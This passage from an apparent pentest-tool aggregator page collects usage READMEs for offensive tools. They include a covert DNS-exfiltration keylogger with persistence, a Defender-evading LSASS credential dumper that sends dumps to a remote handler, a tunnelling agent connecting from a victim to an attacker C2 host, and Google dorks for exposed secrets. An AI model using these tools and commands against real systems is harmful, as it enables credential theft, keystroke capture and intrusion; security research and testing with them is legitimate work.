      | example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
      +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+

      Or to output a CSV file:

      $ sr2t --fortify example/fortify.fpr -oC example
      $ cat example_fortify.csv
      ,type,subtype,severity,confidence,annotations
      example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
      example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
      example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
      example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
      example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
      example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
      example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X

      Donate

      • WOW: WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes

      By: Zion3R β€” March 21st 2024 at 11:30


      This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

      These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.


      Server

      Setup

      The server uses python3.

      To install dependencies, run python3 -m pip install -r requirements.txt

      Starting the Server

      To start the server, run python3 main.py

      usage: dns exfiltration server [-h] [-p PORT] ip domain

      positional arguments:
      ip
      domain

      options:
      -h, --help show this help message and exit
      -p PORT, --port PORT port to listen on

      By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

      ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

      domain is the domain to listen for, which should be the domain that the server is authoritative for.

      Registrar

      On the registrar, you want to change your domain's namespace to custom DNS.

      Point them to two domains, ns1.example.com and ns2.example.com.

      Add records that make point the namespace domains to your exfiltration server's IP address.

      This is the same as setting glue records.

      Client

      Linux

      The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

      logger.sh

      # Usage: logger.sh [-options] domain
      # Positional Arguments:
      # domain: the domain to send data to
      # Options:
      # -p path: give path to log file to listen to
      # -l: run the logger with warnings and errors printed

      To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

      The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

      The -l option will show warnings and errors. Can be useful for debugging.

      logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile to start on every new interactive shell.

      connection.sh

      Usage: command [-options] domain
      Positional Arguments:
      domain: the domain to send data to
      Options:
      -n: number of characters to store before sending a packet

      Windows

      Build

      To build keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output to a file named logger.exe in the build directory.

      make production domain=example.com

      You can also choose to build the program with debugging by making the debug target.

      make debug domain=example.com

      For both targets, you will need to specify the domain the server is listening for.

      Sending Test Requests

      You can use dig to send requests to the server:

      dig @127.0.0.1 a.1.1.1.example.com A +short send a connection request to a server on localhost.

      dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short send a test message to localhost.

      Replace example.com with the domain the server is listening for.

      Protocol

      Starting a Connection

      A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

      The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

      The server will respond with an IP address in following format: 123.123.123.[id]

      Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

      Exfiltrating Data

      A record requests starting with b indicate exfiltrated data being sent to the server.

      The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

      The server will respond with [code].123.123.123

      id is the id that was established on connection. Data is sent as ASCII encoded in hex.

      code is one of the codes described below.

      Response Codes

      200: OK

      If the client sends a request that is processed normally, the server will respond with code 200.

      201: Malformed Record Requests

      If the client sends an malformed record request, the server will respond with code 201.

      202: Non-Existant Connections

      If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

      203: Out of Order Packets

      If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

      204 Reached Max Connection

      If the client attempts to create a connection when the max has reached, the server will respond with code 204.

      Dropped Packets

      Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

      Side Notes

      Linux

      Log File

      The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

      Non-Interactive Shells

      The keylogger relies on script, so the keylogger won't run in non-interactive shells.

      Windows

      Repeated Requests

      For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly

      By: Zion3R β€” March 20th 2024 at 11:30


      MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

      Blog post: https://xre0us.io/posts/multidump


      MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

      Usage

          __  __       _ _   _ _____
      | \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
      | |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
      | | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
      |_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
      |_|

      Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

      -p Path to save procdump.exe, use full path. Default to temp directory
      -l Path to save encrypted dump file, use full path. Default to current directory
      -r Set ip:port to connect to a remote handler
      --procdump Writes procdump to disk and use it to dump LSASS
      --nodump Disable LSASS dumping
      --reg Dump SAM, SECURITY and SYSTEM hives
      --delay Increase interval between connections to for slower network speeds
      -v Enable v erbose mode

      MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
      Examples:
      MultiDump.exe -l C:\Users\Public\lsass.dmp -v
      MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
      usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

      Handler for RemoteProcDump

      options:
      -h, --help show this help message and exit
      -r REMOTE, --remote REMOTE
      Port to receive remote dump file
      -l LOCAL, --local LOCAL
      Local dump file, key needed to decrypt
      --sam SAM Local SAM save, key needed to decrypt
      --security SECURITY Local SECURITY save, key needed to decrypt
      --system SYSTEM Local SYSTEM save, key needed to decrypt
      -k KEY, --key KEY Key to decrypt local file
      --override-ip OVERRIDE_IP
      Manually specify the IP address for key generation in remote mode, for proxied connection

      As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.

      The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.

      By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.

      MultiDump.exe
      ...
      [i] Local Mode Selected. Writing Encrypted Dump File to Disk...
      [i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
      [i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
      ./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

      If --procdump is used, ProcDump.exe will be writtern to disk to dump LSASS.

      In remote mode, MultiDump connects to the handler's listener.

      ./ProcDumpHandler.py -r 9001
      [i] Listening on port 9001 for encrypted key...
      MultiDump.exe -r 10.0.0.1:9001

      The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.

      An additional option to dump the SAM, SECURITY and SYSTEM hives are available with --reg, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.

      Building MultiDump

      Open in Visual Studio, build in Release mode.

      Customising MultiDump

      It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

      Self deletion can be toggled by uncommenting the following line in Common.h:

      #define SELF_DELETION

      To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

      //#define DEBUG

      MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/

      Credits



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist

      By: Zion3R β€” March 19th 2024 at 11:30

      This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.


      TL;DR

      Installation

      1. Visit Jython Offical Site, and download the latest stand alone JAR file, e.g. jython-standalone-2.7.3.jar.
      2. Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
      3. On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
      4. Download the GAP.py and requirements.txt from this project and place in the same directory.
      5. Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
      6. Go to the Extensions -> Installed and click Add under Burp Extensions.
      7. Select Extension type of Python and select the GAP.py file.

      Using

      1. Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:

      Or you can right click a request or response in any other context and select GAP from the Extensions menu.

      1. Then go to the GAP tab to see the results:

      IMPORTANT Notes

      If you don't need one of the modes, then un-check it as results will be quicker.

      If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two target in the Site Map view at a time, as huge projects can have consume a lot of resources.

      If you want to run GAP on one of more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.

      It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.

      The Words mode uses the beautifulsoup4 library and this can be quite slow, so be patient!

      In Depth Instructions

      Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.

      NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.

      TODO

      • Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
      • Add an option to not add the Tentaive Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).
      • Improve performance of the link finding regular expressions.
      • Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
      • Deal with other size displays and font sizes better to make sure all controls are viewable.
      • If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
      • Use an alternative to beautifulsoup4 that is faster to parse responses for Words.

      Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! β˜• (I could use the caffeine!)

      🀘 /XNL-h4ck3r



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite

      By: Zion3R β€” March 17th 2024 at 11:30


      mapXplore is a modular application that imports data extracted of the sqlmap to PostgreSQL or SQLite database.

      Its main features are:

      • Import of information extracted from sqlmap to PostgreSQL or SQLite for subsequent querying.
      • Sanitized information, which means that at the time of import, it decodes or transforms unreadable information into readable information.
      • Search for information in all tables, such as passwords, users, and desired information.
      • Automatic export of information stored in base64, such as:

        • Word, Excel, PowerPoint files
        • .zip files
        • Text files or plain text information
        • Images
      • Filter tables and columns by criteria.

      • Filter by different types of hash functions without requiring prior conversion.
      • Export relevant information to Excel or HTML

      Installation

      Requirements

      • python-3.11
      git clone https://github.com/daniel2005d/mapXplore
      cd mapXplore
      pip install -r requirements

      Usage

      It is a modular application, and consists of the following:

      • config: It is responsible for configuration, such as the database engine to use, import paths, among others.
      • import: It is responsible for importing and processing the information extracted from sqlmap.
      • query: It is the main module capable of filtering and extracting the required information.
        • Filter by tables
        • Filter by columns
        • Filter by one or more words
        • Filter by one or more hash functions within which are:
          • MD5
          • SHA1
          • SHA256
          • SHA3
          • ....

      Beginning

      Allows loading a default configuration at the start of the program

      python engine.py [--config config.json]

      Modules



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting

      By: Zion3R β€” March 14th 2024 at 11:30


      A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting

      Live Tool


      Broad domain search w/ negative search

      site:example.com -www -shop -share -ir -mfa

      PHP extension w/ parameters

      site:example.com ext:php inurl:?

      Disclosed XSS and Open Redirects

      site:openbugbounty.org inurl:reports intext:"example.com"

      Juicy Extensions

      site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess

      XSS prone parameters

      inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com

      Open Redirect prone parameters

      inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com

      SQLi Prone Parameters

      inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com

      SSRF Prone Parameters

      inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com

      LFI Prone Parameters

      inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com

      RCE Prone Parameters

      inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com

      High % inurl keywords

      inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com

      Sensitive Parameters

      inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com

      API Docs

      inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com"

      Code Leaks

      site:pastebin.com "example.com"

      site:jsfiddle.net "example.com"

      site:codebeautify.org "example.com"

      site:codepen.io "example.com"

      Cloud Storage

      site:s3.amazonaws.com "example.com"

      site:blob.core.windows.net "example.com"

      site:googleapis.com "example.com"

      site:drive.google.com "example.com"

      site:dev.azure.com "example[.]com"

      site:onedrive.live.com "example[.]com"

      site:digitaloceanspaces.com "example[.]com"

      site:sharepoint.com "example[.]com"

      site:s3-external-1.amazonaws.com "example[.]com"

      site:s3.dualstack.us-east-1.amazonaws.com "example[.]com"

      site:dropbox.com/s "example[.]com"

      site:box.com/s "example[.]com"

      site:docs.google.com inurl:"/d/" "example[.]com"

      JFrog Artifactory

      site:jfrog.io "example[.]com"

      Firebase

      site:firebaseio.com "example[.]com"

      File upload endpoints

      site:example.com "choose file"

      Dorks that work better w/o domain

      Bug Bounty programs and Vulnerability Disclosure Programs

      "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"

      site:*/security.txt "bounty"

      Apache Server Status Exposed

      site:*/server-status apache

      WordPress

      inurl:/wp-admin/admin-ajax.php

      Drupal

      intext:"Powered by" & intext:Drupal & inurl:user

      Joomla

      site:*/joomla/login


      Medium articles for more dorks:

      https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906

      https://infosecwriteups.com/uncover-hidden-gems-in-the-cloud-with-google-dorks-8621e56a329d

      https://infosecwriteups.com/10-google-dorks-for-sensitive-data-9454b09edc12

      Top Parameters:

      https://github.com/lutfumertceylan/top25-parameter

      Proviesec dorks:

      https://github.com/Proviesec/google-dorks



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems

      By: Zion3R β€” March 12th 2024 at 23:38


      GTFOcli it's a Command Line Interface for easy binaries search commands that can be used to bypass local security restrictions in misconfigured systems.


      Installation

      Using go:

      go install github.com/cmd-tools/gtfocli@latest

      Using homebrew:

      brew tap cmd-tools/homebrew-tap
      brew install gtfocli

      Using docker:

      docker pull cmdtoolsowner/gtfocli

      Usage

      Search for unix binaries

      Search for binary tar:

      gtfocli search tar

      Search for binary tar from stdin:

      echo "tar" | gtfocli search

      Search for binaries located into file;

      cat myBinaryList.txt
      /bin/bash
      /bin/sh
      tar
      arp
      /bin/tail

      gtfocli search -f myBinaryList.txt

      Search for windows binaries

      Search for binary Winget.exe:

      gtfocli search Winget --os windows

      Search for binary Winget from stdin:

      echo "Winget" | gtfocli search --os windows

      Search for binaries located into file:

      cat windowsExecutableList.txt
      Winget
      c:\\Users\\Desktop\\Ssh
      Stordiag
      Bash
      c:\\Users\\Runonce.exe
      Cmdkey
      c:\dir\subDir\Users\Certreq.exe

      gtfocli search -f windowsExecutableList.txt --os windows

      Search for binary Winget and print output in yaml format (see -h for available formats):

      gtfocli search Winget -o yaml --os windows

      Search using dockerized solution

      Examples:

      Search for binary Winget and print output in yaml format:

      docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows

      Search for binary tar and print output in json format:

      echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json

      Search for binaries located into file mounted as volume in the container:

      cat myBinaryList.txt
      /bin/bash
      /bin/sh
      tar
      arp
      /bin/tail

      docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt

      CTF

      An example of common use case for gtfocli is together with find:

      find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null

      or

      find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search

      Credits

      Thanks to GTFOBins and LOLBAS, without these projects gtfocli would never have come to light.

      Contributing

      You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Kali Linux 2024.1 - Penetration Testing and Ethical Hacking Linux Distribution

      By: Zion3R β€” March 3rd 2024 at 01:01

      Time for another Kali Linux release! – Kali Linux 2024.1. This release has various impressive updates.


      The summary of the changelog since the 2023.4 release from December is:

      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      SwaggerSpy - Automated OSINT On SwaggerHub

      By: Zion3R β€” February 19th 2024 at 11:30


      SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.


      What is Swagger?

      Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.


      About SwaggerHub

      SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.


      Why OSINT on SwaggerHub?

      Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:

      1. Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.

      2. Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.

      3. Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.

      4. Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.

      5. Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.

      6. Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.

      By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.


      How SwaggerSpy Works

      SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.


      Getting Started

      To use SwaggerSpy, follow these steps:

      1. Installation: Clone the SwaggerSpy repository and install the required dependencies.
      git clone https://github.com/UndeadSec/SwaggerSpy.git
      cd SwaggerSpy
      pip install -r requirements.txt
      1. Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
      python swaggerspy.py searchterm
      1. Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.

      Disclaimer

      SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.


      Contribution

      Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.


      About the Author

      SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)

      I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.


      TODO

      Regular Expressions Enhancement
      • [ ] Review and improve existing regular expressions.
      • [ ] Ensure that regular expressions adhere to best practices.
      • [ ] Check for any potential optimizations in the regex patterns.
      • [ ] Test regular expressions with various input scenarios for accuracy.
      • [ ] Document any complex or non-trivial regex patterns for better understanding.
      • [ ] Explore opportunities to modularize or break down complex patterns.
      • [ ] Verify the regular expressions against the latest specifications or requirements.
      • [ ] Update documentation to reflect any changes made to the regular expressions.

      License

      SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.


      Thanks

      Special thanks to @Liodeus for providing project inspiration through swaggerHole.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

      By: Zion3R β€” February 5th 2024 at 11:30


      navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


      Techniques

      Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:

      Heuristics

      navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.

      Brute-force

      navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.

      Installation

      git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
      go build

      Acknowledgements



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Nemesis - An Offensive Data Enrichment Pipeline

      By: Zion3R β€” February 3rd 2024 at 11:30


      Nemesis is an offensive data enrichment pipeline and operator support system.

      Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

      Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


      Setup / Installation

      See the setup instructions.

      Contributing / Development Environment Setup

      See development.md

      Further Reading

      Post Name Publication Date Link
      Hacking With Your Nemesis Aug 9, 2023 https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
      Challenges In Post-Exploitation Workflows Aug 2, 2023 https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
      On (Structured) Data Jul 26, 2023 https://posts.specterops.io/on-structured-data-707b7d9876c6

      Acknowledgments

      Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!

      We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

      By: Zion3R β€” January 26th 2024 at 11:30


      Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


      Features

      • Tun interface (No more SOCKS!)
      • Simple UI with agent selection and network information
      • Easy to use and setup
      • Automatic certificate configuration with Let's Encrypt
      • Performant (Multiplexing)
      • Does not require high privileges
      • Socket listening/binding on the agent
      • Multiple platforms supported for the agent

      How is this different from Ligolo/Chisel/Meterpreter... ?

      Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

      When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

      As an example, for a TCP connection:

      • SYN are translated to connect() on remote
      • SYN-ACK is sent back if connect() succeed
      • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
      • Nothing is sent if timeout

      This allows running tools like nmap without the use of proxychains (simpler and faster).

      Building & Usage

      Precompiled binaries

      Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

      Building Ligolo-ng

      Building ligolo-ng (Go >= 1.20 is required):

      $ go build -o agent cmd/agent/main.go
      $ go build -o proxy cmd/proxy/main.go
      # Build for Windows
      $ GOOS=windows go build -o agent.exe cmd/agent/main.go
      $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

      Setup Ligolo-ng

      Linux

      When using Linux, you need to create a tun interface on the Proxy Server (C2):

      $ sudo ip tuntap add user [your_username] mode tun ligolo
      $ sudo ip link set ligolo up

      Windows

      You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

      Running Ligolo-ng proxy server

      Start the proxy server on your Command and Control (C2) server (default port 11601):

      $ ./proxy -h # Help options
      $ ./proxy -autocert # Automatically request LetsEncrypt certificates

      TLS Options

      Using Let's Encrypt Autocert

      When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

      Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

      Using your own TLS certificates

      If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

      Automatic self-signed certificates (NOT RECOMMENDED)

      The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

      The -ignore-cert option needs to be used with the agent.

      Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

      Using Ligolo-ng

      Start the agent on your target (victim) computer (no privileges are required!):

      $ ./agent -connect attacker_c2_server.com:11601

      If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

      A session should appear on the proxy server.

      INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

      Use the session command to select the agent.

      ligolo-ng Β» session 
      ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

      Display the network configuration of the agent using the ifconfig command:

      [Agent : nchatelain@nworkstation] Β» ifconfig 
      [...]
      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
      β”‚ Interface 3 β”‚
      β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
      β”‚ Name β”‚ wlp3s0 β”‚
      β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
      β”‚ MTU β”‚ 1500 β”‚
      β”‚ Flags β”‚ up|broadcast|multicast β”‚
      β”‚ IPv4 Address β”‚ 192.168.0.30/24 β”‚
